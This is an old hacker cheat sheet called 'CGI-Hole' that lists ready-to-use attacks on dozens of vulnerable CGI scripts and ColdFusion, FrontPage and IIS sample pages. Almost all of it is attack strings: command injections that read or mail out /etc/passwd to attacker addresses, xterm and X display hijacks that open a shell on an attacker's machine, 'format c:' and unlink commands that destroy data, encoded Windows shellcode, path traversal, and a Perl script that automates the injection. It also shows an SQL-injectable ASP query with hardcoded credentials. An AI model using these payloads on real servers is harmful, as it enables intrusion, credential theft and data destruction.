CGI

CGI-Hole (par putois)

AT-generate.cgi

<html> >head>>title>exploit>/title>
<body>
<p>>FORM ACTION="http://EWS.SERVER.COM/cgi-bin/AT-generate.cgi" METHOD=POST>
<INPUT TYPE="hidden" NAME="db" VALUE="personal">
<INPUT TYPE="submit" NAME="Reload" VALUE="Reload">
Reload this page, in case the log file or status has changed.
<INPUT TYPE="hidden" NAME="Dump" VALUE="dummy">
<INPUT TYPE="hidden" NAME="File"
VALUE="/usr/local/etc/excite/collections/AT-personal.prog"
<INPUT TYPE="hidden" NAME="Type" VALUE="progress">
<INPUT TYPE="hidden" NAME="ENCRYPTEDPASS" VALUE="ENCRYPTEDPASS">
</FORM>>BR>
</body>
</html>

anyform.cgi

aglimpse (telnet 80)

GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5hack\@i.am\</etc/passwd;eval$CMD;echo HTTP/1.0

bnbform.cgi

FORM METHOD="POST" ACTION="http://www.victim.com/cgi-bin/bnbform.cgi">
FIELDS MARKED WITH * ARE REQUIRED!
Your Name:*
<INPUT TYPE="TEXT" NAME="name" SIZE=35 MAXLENGTH=50>

<INPUT TYPE="HIDDEN" NAME="autorespond" VALUE="yes">
<INPUT TYPE="HIDDEN" NAME="automessage" VALUE="/etc/passwd">
<INPUT TYPE="HIDDEN" NAME="ok_url" VALUE="http://127.0.0.1/thanks.html">
<INPUT TYPE="HIDDEN" NAME="not_ok_url" VALUE="http://127.0.0.1/oops.html">

campas (telnet 80)

GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a

carbo

http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog

cgimail.exe (nt)

classifieds.cgi

<form method=post action="/cgi-bin/classifieds.cgi">
<input type="hidden" name="ClassifiedsDir" value="/home/httpd/html/class/ads/">
<input type="hidden" name="ViewDir" value="http://victim.com/class/ads/">
<input type="hidden" name="ErrorReturn" value="http://victim.com/class/index.html">
<input type="hidden" name="ReturnURL" value="http://victim.com/class/hi.html">
<input type="hidden" name="return" value="duke@viper.net.au">
<input type="hidden" name="mailprog" value="touch /tmp/bighole">
<b>Which department do you want your ad to be placed in or you would like to view?
</form>

count.cgi

http://attacked.host.com/cgi-bin/Count.cgi?display=image&image=../../path/file.gif

dumpenv.pl

http://www.site.net/cgi-bin/dumpenv.pl?/session/adminlogin?RCpage=/sysadmin/index.stm
http://www.site.net/c:/program files/sambar41

environ.cgi (telnet 80)

/cgi-bin/environ.cgi HTTP/1.1" 200 2034

file.pl

http://netware.nmrc.org/perl/files.pl?file=sys:system/autoexec.ncf
http://netware.nmrc.org/perl/files.pl?file=sys:etc/ldremote.ncf
http://netware.nmrc.org/perl/files.pl?file=vol2:apps/accounting/payroll.doc

faxsurvey

http://linux.elsewhere.org/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

FormMail

guestbook

/cgi-bin/wguest.exe?template=3dc:\boot.ini
/cgi-bin/rguest.exe?template=3dc:\winnt\system32\$winnt$.inf

handler (telnet 80)

GET /cgi-bin/handler/useless_shit;cat /etc/passwd|?data=Download HTTP/1.0
-> push tab key after cat

GET /cgi-bin/handler/whatever;cat /etc/passwd| ?data=Download
/cgi-bin/handler/whatever;cat\t/etc/passwd\|\t
GET /cgi-bin/handler/ ;/usr/sbin/xwsh -display enemy:0|?data=Download
GET /cgi-bin/handler/ ;cat /etc/passwd|?data=Download

htmlscript

http://www.vulnerable.server.com/cgi-bin/htmlscript?../../../../etc/passwd

httpd (telnet 80)

GET / HTTP/1.0" 404 -9999999 "

info2www

REQUEST_METHOD=GET ./info2www '(../../../../bin/mail user_name </etc/passwd|)'

nph-test-cgi (test-cgi)

just that:
/cgi-bin/nph-test.cgi /*
/cgi-bin/nph-test.cgi /*etc/*
/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd

note: only with netscape 3 on windows

nph-publish

HTTP/1.0 400
Request method must be PUT to call this script!
PUT /../index.html HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/3.01Gold (Win95; I)
Host: 127.0.0.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Length: 666

perl.exe

http://myhost.com/cgi-bin/perl.exe?-e?'format?c:'
http://host.com/cgi-bin/perl.exe?-e?'format%20c:'
http://www.target.com/cgi-bin/perl.exe?&-e+unlink+%3C*%3E

pfdispaly.cgi

lynx -source 'http://victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/
$lynx -dump http://victim/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'

phf

/cgi-bin/phf?Qname=%0Acat%20/etc/passwd
/cgi-bin/phf?Qname=%0Acd%20/%0als
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

php.cgi

http://boogered.system.com/cgi-bin/php.cgi?/file/to/view

Quid Pro Quo (mac os)

http://site.name/server%20logfile

s97_cgi

http://www.xxx.com/search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/passwd &ResultStyle=simple&ResultCount=20&collection=books

survey.cgi

<FORM METHOD="POST" ACTION="www.victim.com/cgi-bin/survey.cgi">
<input type=hidden name=action value="VOTE">
<input type=hidden name=filebase value="bleh; /bin/mail you@your_email_address.com
<PRE>
Your Gender
<input type=radio name=ITEM1 value="0">Male
<input type=radio name=ITEM1 value="1">Female
<input type=radio name=ITEM1 value="2">Neuter
<INPUT TYPE="submit" VALUE="VOTE!">

start

/cgi-bin/start?curmbox=ACTIVE&js=no&login

textcounter

#!/usr/bin/perl
$URL='http://dtp.kappa.ro/a/test.shtml'; # please _modify_ this
$EMAIL='pdoru@pop3.kappa.ro,root'; # please _modify_ this
if ($ARGV[0]) {
$CMD=$ARGV[0];
}else{
$CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothere_one";
}
$text="${URL}/;IFS=\8;${CMD};echo|";
$text =~ s/ /\$\{IFS\}/g;
system({"lynx"} "lynx", $text);
system({"lynx"} "lynx", $text);

uploader.exe

<FORM ENCTYPE="multipart/form-data" METHOD=POST ACTION="/cgi-win/uploader.exe/Uploads/">
<PRE>Your name: <INPUT TYPE=TEXT SIZE=20 NAME="name"> (required)
Email address: <INPUT TYPE=TEXT SIZE=20 NAME="email"> (required)
<b>NOTE:</b>
File to upload: <INPUT TYPE=FILE NAME="upl-file" SIZE=40>
File description: <INPUT TYPE=TEXT SIZE=40 NAME="desc"> (required)
<INPUT TYPE=SUBMIT VALUE="Upload Now">

</FORM>

<FORM ENCTYPE="multipart/form-data" METHOD=POST ACTION="http://host.of.vulnerable.website/cgi-win/uploader.exe/cgi-win/">
<INPUT TYPE=HIDDEN NAME="name" VALUE="Foo">
<INPUT TYPE=HIDDEN NAME="email" VALUE="Foo@bar.com>
File to upload: <INPUT TYPE=FILE NAME="upl-file" SIZE=40><BR>
<INPUT TYPE=TEXT SIZE=40 NAME="desc" VALUE="YouGottaSecurityProblem">
<INPUT TYPE=SUBMIT VALUE="Upload Now">
</FORM>

view-source

http://hack.com/cgi-bin/view-source?../../../../../../../etc/passwd'

webdist

http://host.com/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd
http://host/cgi-bin/webdist.cgi?distloc=;/usr/bin/X11/xterm%20-display%20hacker:0.0%20-ut%20-e%20/bin/sh

* run also for : wrap.cgi, handler.cgi, day5datacopier.cgi, day5notifier.cgi

http://victim/cgi-bin/wrap/blah;/tmp/myscript
http://sgi.victim/cgi-bin/wrap?/../../../../../etc

webgais

telnet target.machine.com 80
POST /cgi-bin/webgais HTTP/1.0
Content-length: 80 (replace this with the actual length of
the "exploit" line)
query=';mail+you\@your.host</etc/passwd;echo'&output=subject
&domain=paragraph

websendmail

telnet target.machine.com 80
Content-length: xxx (should be replaced with the actual length of
the string passed to the server, in this case xxx=97)
receiver=;mail+your_address\@somewhere.org</etc/passwd;&sender=a &rtnaddr=a&subject=a&content=a

websites

http://website.host/cgi-dos/args.cmd?"&any+dos+command"
http://website.host/cgi-dos/args.bat?"&any+dos+command"

(winnt version)
http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\y[X%050PzPA9%01u%F0%83%E9%10%
FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy
_\WebSite\readme.1st_\WebSite\htdocs\x1.htm

(win95 version)
http://website.host/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A
%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%0
3%CA%FF%D1c:\command.com_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\
x1.htm

webstart

http://your.site/WebSTAR%20LOG

wwwboard.pl

whois_raw

/cgi-bin/whois_raw.cgi?fqdn=%0Acat%20/etc/passwd

www-msql

http://www.thegnome.com/secure/.htaccess
http://www.thegnome.com/secure/.wwwacl
http://your.server/cgi-bin/www-sql/protected/something.html

Cold fusion

http://www.server.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\repair\setup.log
http://www.server.com/cfdocs/expeval/ExprCalc.cfm?RequestTimeout=2000&OpenFilePath=C:\Inetpub\wwwroot\cfdocs\expeval\.\myfile.txt
http://www.server.com/cfdocs/expeval/kdg.cfm?DirPath=C%3A%5Cinetpub%5Cwwwroot%5C
http://www.server.com//cfdocs/expeval/sendmail.cfm?MailFrom=&MailTo=&Subject=&Message=
http://server/cfdocs/snippets/fileexists.cfm?..\..\..\..\boot.ini
http://server/cfdocs/snippets/gettempdirectory.cfm
http://server/cfdocs/snippets/viewexample.cfm?Tagname=..\..\

front page

<form method="POST" action="../_vti_bin/shtml.dll/downloads/ftp.html"name="FrontPage_Form1" webbot-action="--WEBBOT-SELF--">

/scripts/iisadmin/bdir.htr??<path>
/scripts/iisadmin/bdir.htr??d:\webs\
http://site/iissamples/exair/howitworks/codebrws.asp?source=/../../boot.ini

websql

<% SQLquery="SELECT * FROM phonetable"
Set Conn = Server.CreateObject("ADODB.Connection")
Conn.Open "DSN=websql;UID=sa;PWD=pwd;DATABASE=master"
Set rec = Server.CreateObject("ADODB.RecordSet") rec.ActiveConnection=Conn
rec.Open SQLquery %>

<% SQLquery="SELECT * FROM phonetable WHERE name='" & _
request.querystring("name") & "'"
Set Conn = Server.CreateObject("ADODB.Connection")
Conn.Open "DSN=websql;UID=sa;PWD=pwd;DATABASE=master"
Set rec = Server.CreateObject("ADODB.RecordSet")
rec.ActiveConnection=Conn
rec.Open SQLquery %>